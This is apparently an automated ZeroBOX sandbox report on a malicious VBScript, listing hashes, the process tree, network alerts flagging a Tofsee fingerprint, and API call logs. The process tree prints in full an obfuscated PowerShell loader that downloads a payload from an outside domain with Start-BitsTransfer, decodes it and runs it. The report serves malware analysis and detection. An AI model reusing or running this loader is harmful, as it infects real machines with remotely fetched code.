Summary | ZeroBOX

Svmninge.vbs

Generic Malware Antivirus
Category: FILE
Machine: s1_win7_x6401
Started: July 19, 2023, 9:02 a.m.
Completed: July 19, 2023, 9:04 a.m.
Size 55.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 862907006745ef6b2bdc5dd2664f06ec
SHA256 f6f8fcfb80125691e245e06081bd5bec961b042a688a59d9e853929af9df2672
CRC32 E9388B61
ssdeep 768:itWSuK7NEgwhUwavzIPsjXuBmFcp5o+1w/LSs4ynIgj4KiG:itMK7mDF4zxXu0m5o+1wDz4EI+4e
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Svmninge.vbs

    PID: 2572
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"

      PID: 2752

Name Response Post-Analysis Lookup
www.taramulalbinelor.ro 31.14.23.109

IP Address Status Action
164.124.101.2 Active Moloch
31.14.23.109 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49168 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49166 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49163 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49163 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49163 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49179 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49179 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49163 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49163 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49170 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49170 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49178 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49166 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49166 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49174 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49177 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49177 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49188 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49188 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49188 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49188 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49185 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49185 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49195 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49195 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49191 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49191 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49181 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49181 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49192 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49192 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49189 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49189 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49193 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49193 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49164 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49164 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49164 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49164 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49167 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49167 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49169 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49169 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49187 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49187 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49187 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49194 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 31.14.23.109:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 31.14.23.109:443 -> 192.168.56.101:49194 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49194 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 31.14.23.109:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 31.14.23.109:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49199 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49199 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49196 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49196 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49182 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49182 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49200 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49184 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49200 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49184 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49180 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49180 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49183 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49183 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49197 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49197 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49178 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49178 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49198 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49198 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49186 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49186 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49190 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 31.14.23.109:443 -> 192.168.56.101:49190 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000016b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000227
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000023b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x00000263
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x000002b7
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x000002cf
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x000002e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x000002f7
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x0000030b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x0000031f
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: At line:1 char:19
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: At line:1 char:19
